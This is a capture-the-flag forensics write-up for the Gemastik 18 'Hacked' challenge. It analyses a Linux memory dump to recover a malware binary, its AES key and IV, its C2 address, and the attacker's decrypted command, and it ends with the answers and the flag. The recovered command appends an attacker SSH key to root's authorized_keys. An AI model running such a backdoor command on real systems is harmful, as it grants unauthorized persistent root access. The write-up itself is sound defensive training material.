Gemastik 18 Quals

Write-up for Gemastik's Cyber Security division qualification.

Hacked

I have a Linux server and it looks like it's been hacked... Please help me analyze the attachment I've provided and answer all the questions.

In this challenge, we're given a Linux memory dump. We can use Volatility to help us analyze it. For a Linux memory dump, we need a specific symbol file because many different Linux distributions exist, each with its own unique kernel.

Volatility uses what's called a symbol table to understand the memory layout of a Linux system. Because each Linux kernel version and distribution can have different internal data structures, we must find the correct symbol table for the specific kernel version from which the memory dump was taken. We can refer to the documentation to learn how to create one. However, if a matching symbol table isn't readily available for your distribution, you can often find one at a community-maintained repository like https://github.com/Abyss-W4tcher/volatility3-symbols.

To know which distribution is the memory dump given, we can use plugins banners.Banners.

Now that we know the memory dump is Ubuntu with the spesific version, we can download the symbol file from the repository I mentioned earlier and perform further analysis.

In order to use the symbols file, we need to create a new directory in the same location as the memory dump. Then, each time we use the plugins, we can add -s <directory name> .

For this challenge, we should answer questions to get the flag, so let's analyse it and grab the flag!

  1. Repository used by threat actors

To find the repository used, we can check the bash history of Ubuntu. Normally, to clone a repository, we need to run git clone. So, we can check it use plugins linux.bash to know the bash history in the Ubuntu.

Then, the answer is https://github.com/walawe1337-oss/simple-python-server

  1. MD5 hash of malicious files (lower case)

Once we've got the repository, we can also clone it and get the binaries inside. The binaries have actually been deleted from the repository, but the commit to add them still exists, so we can checkout the previous commit and get the binaries back.

So, based on that, the md5sum of the malicious file is 11e128c2bf2f82f4e966a0ec2ff072bb.

  1. Key and IV used for encryption

After obtaining the binary, we can use reversing apps such as IDA, Ghidra, or Binary Ninja.

We can see the key and the iv is hardcoded in the decompiled program. So the answer for this question is this_is_my_secret_aes_256_key!!!:abcdef1234567890

  1. The IP and port used by the attacker

The screenshot above also shows the IP and port. The IP address is 165.232.133.53, and the port uses hex 0x3017, where the value is 12311. So the answer is 165.232.133.53:12311

  1. Commands executed by the threat actor (within the binary)

The malicious binary does not contain a hardcoded command. Instead, it downloads an encrypted blob of data from a remote server, decrypts it, and then executes the decrypted content as a system command. The threat actor's command is the content of the encrypted data, which is retrieved at runtime. This allows the threat actor to change the command to be executed without having to update the binary itself. But the problem is, the server is already down, so we cant retrieve the encrypted command.

Refer this article, https://isc.sans.edu/diary/20639 and also this blog. We can actually get the network traffic that's passing through the Ubuntu system before it's dumped. We can use Bulk Extractor for that. So, bulk_extractor is a forensic tool that can get valuable info from disk images, files or memory dumps without having to parse the file system. It works by scanning for specific patterns, like email addresses, credit card numbers, or in this case, strings, IP addresses, and network traffic data.

Now we have the captured network data, and we can open it up use Wireshark and filter it to the spesific IP we have before.

We can see in the package 58, where the encrypted command is captured

Then, with the key and iv we have, and the information of the encryption method use, we can decrypt the command to answer the question

So, the answer is echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICUHM+DTrehpFANzpOzDPUJi1DYaK1xwMpMLz1QqwxJ0 kali@kali" >> /root/.ssh/authorized_keys

  1. MITRE ATT&CK techniques based on previous questions

The command before adds a new SSH public key to the authorized_keys file for the root user. This file dictates which public keys are authorized to log in to the account without a password. This action maps directly to the MITRE ATT&CK framework as T1098.004. Where the persistence technique use is account manipulation through SSH authorized keys. So, the answer is T1098.004

Please answer the following questions:
No 1:
Question: Repositori yang digunakan threat actor
Format: https://example/path/to/repo
Answer:
[+] Answering question 1: https://github.com/walawe1337-oss/simple-python-server
Correct
No 2:
Question: Hash MD5 file yang bersifat malicious (Lower case)
Format: -
Answer:
[+] Answering question 2: 11e128c2bf2f82f4e966a0ec2ff072bb
Correct
No 3:
Question: Key and IV yang digunakan untuk enkripsi
Format: key:iv
Answer:
[+] Answering question 3: this_is_my_secret_aes_256_key!!!:abcdef1234567890
Correct
No 4:
Question: IP dan port yang digunakan oleh penyerang
Format: ip:port
Answer:
[+] Answering question 4: 165.232.133.53:12311
Correct
No 5:
Question: Perintah yang dieksekusi threat actor (didalam binary)
Format: -
Answer:
[+] Answering question 5: echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICUHM+DTrehpFANzpOzDPUJi1DYaK1xwMpMLz1QqwxJ0 kali@kali" >> /root/.ssh/authorized_keys
Correct
No 6:
Question: Teknik MITRE ATT&CK berdasarkan pertanyaan sebelumnya
Format: T12345.123
Answer:
[+] Answering question 6: T1098.004
Correct
Congrats! Flag: GEMASTIK18{5230e7b97ebd5d1a23d956aae28fbb9d}
[!] Connection closed by server
PreviousHolmes CTF 2025NextITSEC CTF 2025 Writeup

Last updated